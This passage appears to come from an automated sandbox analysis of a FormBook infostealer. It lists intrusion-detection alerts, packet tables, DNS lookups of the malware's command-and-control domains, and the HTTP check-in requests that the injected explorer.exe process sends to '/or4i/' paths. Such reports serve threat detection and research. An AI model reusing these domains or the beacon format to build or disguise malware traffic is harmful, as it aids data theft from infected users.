                                                        05/12/21-07:36:58.988852TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.364.190.62.111
                                                        05/12/21-07:36:58.988852TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.364.190.62.111
                                                        05/12/21-07:37:04.217828TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                        05/12/21-07:37:04.217828TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                        05/12/21-07:37:04.217828TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.334.102.136.180
                                                        05/12/21-07:37:04.354921TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.3

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 12, 2021 07:36:25.386116028 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.545658112 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.545857906 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.546082020 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.705415010 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.815865040 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.816132069 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.816175938 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:25.816235065 CEST4972780192.168.2.3119.18.54.126
                                                        May 12, 2021 07:36:25.975882053 CEST8049727119.18.54.126192.168.2.3
                                                        May 12, 2021 07:36:31.457963943 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:31.763951063 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:31.764115095 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:31.764292955 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:32.069766045 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:32.071120977 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:32.071140051 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:32.071275949 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:32.071352005 CEST4973380192.168.2.3163.43.122.109
                                                        May 12, 2021 07:36:32.378624916 CEST8049733163.43.122.109192.168.2.3
                                                        May 12, 2021 07:36:37.515737057 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.556760073 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.556889057 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.560159922 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.601880074 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.612606049 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.612651110 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:37.612804890 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.612955093 CEST4973480192.168.2.3104.21.46.55
                                                        May 12, 2021 07:36:37.654967070 CEST8049734104.21.46.55192.168.2.3
                                                        May 12, 2021 07:36:47.877574921 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.928168058 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.928282022 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.928524017 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.980168104 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.980216980 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.980243921 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:47.980434895 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:47.980536938 CEST4973680192.168.2.387.98.148.38
                                                        May 12, 2021 07:36:48.033574104 CEST804973687.98.148.38192.168.2.3
                                                        May 12, 2021 07:36:53.065385103 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:53.337536097 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:53.337632895 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:53.337873936 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:53.668983936 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:53.850891113 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:54.001211882 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:54.001437902 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:54.122675896 CEST8049737154.84.101.247192.168.2.3
                                                        May 12, 2021 07:36:54.124511003 CEST4973780192.168.2.3154.84.101.247
                                                        May 12, 2021 07:36:58.942466021 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:58.988545895 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:58.988671064 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:58.988852024 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:59.034358978 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:59.068284035 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:59.068312883 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:36:59.068438053 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:59.068619967 CEST4973880192.168.2.364.190.62.111
                                                        May 12, 2021 07:36:59.114044905 CEST804973864.190.62.111192.168.2.3
                                                        May 12, 2021 07:37:04.175647974 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.217358112 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.217525959 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.217828035 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.260392904 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.354921103 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.354943991 CEST804974134.102.136.180192.168.2.3
                                                        May 12, 2021 07:37:04.355241060 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.355380058 CEST4974180192.168.2.334.102.136.180
                                                        May 12, 2021 07:37:04.396428108 CEST804974134.102.136.180192.168.2.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 12, 2021 07:35:01.868086100 CEST6098553192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:01.925163031 CEST53609858.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:02.001374960 CEST5020053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:02.094660044 CEST53502008.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:02.440005064 CEST5128153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:02.493030071 CEST53512818.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:03.339555025 CEST4919953192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:03.389594078 CEST53491998.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:04.433197021 CEST5062053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:04.484838009 CEST53506208.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:04.533371925 CEST6493853192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:04.591986895 CEST53649388.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:05.743690968 CEST6015253192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:05.792412996 CEST53601528.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:06.714699030 CEST5754453192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:06.766304970 CEST53575448.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:07.906347036 CEST5598453192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:07.957951069 CEST53559848.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:08.944035053 CEST6418553192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:09.001530886 CEST53641858.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:10.192361116 CEST6511053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:10.241082907 CEST53651108.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:12.278356075 CEST5836153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:12.333632946 CEST53583618.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:13.772128105 CEST6349253192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:13.820853949 CEST53634928.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:15.912441015 CEST6083153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:15.964009047 CEST53608318.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:17.162112951 CEST6010053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:17.213691950 CEST53601008.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:18.284503937 CEST5319553192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:18.336117029 CEST53531958.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:19.086713076 CEST5014153192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:19.135622025 CEST53501418.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:24.923013926 CEST5302353192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:24.973144054 CEST53530238.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:26.943756104 CEST4956353192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:26.992523909 CEST53495638.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:28.041414976 CEST5135253192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:28.090158939 CEST53513528.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:28.881341934 CEST5934953192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:28.932116985 CEST53593498.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:30.398412943 CEST5708453192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:30.447227001 CEST53570848.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:36.635267019 CEST5882353192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:36.697545052 CEST53588238.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:49.593894005 CEST5756853192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:49.666579008 CEST53575688.8.8.8192.168.2.3
                                                        May 12, 2021 07:35:57.115423918 CEST5054053192.168.2.38.8.8.8
                                                        May 12, 2021 07:35:57.172544003 CEST53505408.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:15.867855072 CEST5436653192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:16.878719091 CEST5436653192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:17.926945925 CEST5436653192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:19.941365004 CEST53543668.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:20.953538895 CEST53543668.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:21.998647928 CEST53543668.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:22.044761896 CEST5303453192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:22.105000973 CEST53530348.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:24.963274956 CEST5776253192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:25.373923063 CEST53577628.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:30.845324039 CEST5543553192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:31.245966911 CEST5071353192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:31.304512978 CEST53507138.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:31.456475019 CEST53554358.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:37.451916933 CEST5613253192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:37.514128923 CEST53561328.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:40.688345909 CEST5898753192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:40.745456934 CEST53589878.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:42.629811049 CEST5657953192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:42.784970045 CEST53565798.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:47.814141989 CEST6063353192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:47.875988960 CEST53606338.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:52.997044086 CEST6129253192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:53.064209938 CEST53612928.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:58.871206999 CEST6361953192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:58.940164089 CEST53636198.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:01.478374004 CEST6493853192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:01.527139902 CEST53649388.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:03.962233067 CEST6194653192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:04.019355059 CEST53619468.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:04.112806082 CEST6491053192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:04.174323082 CEST53649108.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:09.665203094 CEST5212353192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:09.728729963 CEST53521238.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:14.744381905 CEST5613053192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:14.937685966 CEST53561308.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:20.276674986 CEST5633853192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:21.290323019 CEST5633853192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:22.305836916 CEST5633853192.168.2.38.8.8.8

                                                        ICMP Packets

                                                        TimestampSource IPDest IPChecksumCodeType
                                                        May 12, 2021 07:36:20.954955101 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                        May 12, 2021 07:36:21.998903036 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        May 12, 2021 07:36:15.867855072 CEST192.168.2.38.8.8.80xbfe0Standard query (0)www.aqayeseo.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:16.878719091 CEST192.168.2.38.8.8.80xbfe0Standard query (0)www.aqayeseo.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:17.926945925 CEST192.168.2.38.8.8.80xbfe0Standard query (0)www.aqayeseo.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:24.963274956 CEST192.168.2.38.8.8.80x6b2dStandard query (0)www.king-jackpot.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:30.845324039 CEST192.168.2.38.8.8.80x2265Standard query (0)www.0o-a-8v4l76.netA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:37.451916933 CEST192.168.2.38.8.8.80xfb14Standard query (0)www.downtoearthwork.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:42.629811049 CEST192.168.2.38.8.8.80x2a0dStandard query (0)www.smartmatch-dating-api.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:47.814141989 CEST192.168.2.38.8.8.80xad70Standard query (0)www.topcasino-111.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:52.997044086 CEST192.168.2.38.8.8.80xd165Standard query (0)www.shebagholdings.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:58.871206999 CEST192.168.2.38.8.8.80xaaaaStandard query (0)www.booweats.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:04.112806082 CEST192.168.2.38.8.8.80x4ec2Standard query (0)www.xn--espacesacr-k7a.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:09.665203094 CEST192.168.2.38.8.8.80x451dStandard query (0)www.lingoblasterdiscount.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:14.744381905 CEST192.168.2.38.8.8.80xe832Standard query (0)www.painteredmond.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:20.276674986 CEST192.168.2.38.8.8.80x8d20Standard query (0)www.cylindberg.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:21.290323019 CEST192.168.2.38.8.8.80x8d20Standard query (0)www.cylindberg.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:22.305836916 CEST192.168.2.38.8.8.80x8d20Standard query (0)www.cylindberg.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        May 12, 2021 07:36:19.941365004 CEST8.8.8.8192.168.2.30xbfe0Server failure (2)www.aqayeseo.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:20.953538895 CEST8.8.8.8192.168.2.30xbfe0Server failure (2)www.aqayeseo.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:21.998647928 CEST8.8.8.8192.168.2.30xbfe0Server failure (2)www.aqayeseo.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:25.373923063 CEST8.8.8.8192.168.2.30x6b2dNo error (0)www.king-jackpot.comking-jackpot.comCNAME (Canonical name)IN (0x0001)
                                                        May 12, 2021 07:36:25.373923063 CEST8.8.8.8192.168.2.30x6b2dNo error (0)king-jackpot.com119.18.54.126A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:31.456475019 CEST8.8.8.8192.168.2.30x2265No error (0)www.0o-a-8v4l76.net163.43.122.109A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:37.514128923 CEST8.8.8.8192.168.2.30xfb14No error (0)www.downtoearthwork.com104.21.46.55A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:37.514128923 CEST8.8.8.8192.168.2.30xfb14No error (0)www.downtoearthwork.com172.67.223.227A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:42.784970045 CEST8.8.8.8192.168.2.30x2a0dServer failure (2)www.smartmatch-dating-api.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:47.875988960 CEST8.8.8.8192.168.2.30xad70No error (0)www.topcasino-111.com87.98.148.38A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:53.064209938 CEST8.8.8.8192.168.2.30xd165No error (0)www.shebagholdings.com154.84.101.247A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:58.940164089 CEST8.8.8.8192.168.2.30xaaaaNo error (0)www.booweats.com64.190.62.111A (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:04.174323082 CEST8.8.8.8192.168.2.30x4ec2No error (0)www.xn--espacesacr-k7a.comxn--espacesacr-k7a.comCNAME (Canonical name)IN (0x0001)
                                                        May 12, 2021 07:37:04.174323082 CEST8.8.8.8192.168.2.30x4ec2No error (0)xn--espacesacr-k7a.com34.102.136.180A (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:09.728729963 CEST8.8.8.8192.168.2.30x451dName error (3)www.lingoblasterdiscount.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:14.937685966 CEST8.8.8.8192.168.2.30xe832No error (0)www.painteredmond.com192.185.0.218A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.king-jackpot.com
                                                        • www.0o-a-8v4l76.net
                                                        • www.downtoearthwork.com
                                                        • www.topcasino-111.com
                                                        • www.shebagholdings.com
                                                        • www.booweats.com
                                                        • www.xn--espacesacr-k7a.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.349727119.18.54.12680C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:25.546082020 CEST1537OUTGET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.king-jackpot.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:25.815865040 CEST1538INHTTP/1.1 404 Not Found
                                                        Date: Wed, 12 May 2021 05:36:25 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Wed, 24 Feb 2021 17:47:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 583
                                                        Vary: Accept-Encoding
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.349733163.43.122.10980C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:31.764292955 CEST1604OUTGET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1
                                                        Host: www.0o-a-8v4l76.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:32.071120977 CEST3396INHTTP/1.1 302 Found
                                                        Date: Wed, 12 May 2021 05:36:31 GMT
                                                        Server: Apache/2.2.13 (Unix)
                                                        Location: http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn
                                                        Content-Length: 310
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 30 6f 2d 61 2d 38 76 34 6c 37 36 2e 6e 65 74 2f 6e 6f 74 66 6f 75 6e 64 3f 4b 64 54 4c 3d 61 32 4a 78 4f 4e 66 48 26 61 6d 70 3b 69 4e 36 3d 2f 59 71 56 32 59 6f 62 5a 46 47 78 51 44 4d 45 50 52 48 33 46 7a 58 33 73 70 35 36 50 49 7a 79 39 69 6b 35 4e 36 67 38 4f 64 4c 47 51 43 39 51 34 64 49 4a 2f 58 6d 39 33 76 66 74 4e 54 6f 52 64 4a 66 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&amp;iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn">here</a>.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.349734104.21.46.5580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:37.560159922 CEST6033OUTGET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.downtoearthwork.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:37.612606049 CEST6034INHTTP/1.1 301 Moved Permanently
                                                        Date: Wed, 12 May 2021 05:36:37 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Wed, 12 May 2021 06:36:37 GMT
                                                        Location: https://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH
                                                        cf-request-id: 0a00acccd800004ab5f298a000000001
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9b5R7pfybtDNbbE6APLcEI0zQ%2B0r1%2BiHouUEjdrQNb%2FAv87mbz5sBIgFXrhjRVtjB5a8Mu9%2FZRi%2FJ8yhFczUihSJ4lmHqXk%2FI2DhJrSLLXjUzNP6slncdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 64e14a5afc2c4ab5-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.34973687.98.148.3880C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:47.928524017 CEST6068OUTGET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.topcasino-111.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:47.980216980 CEST6069INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.19.4
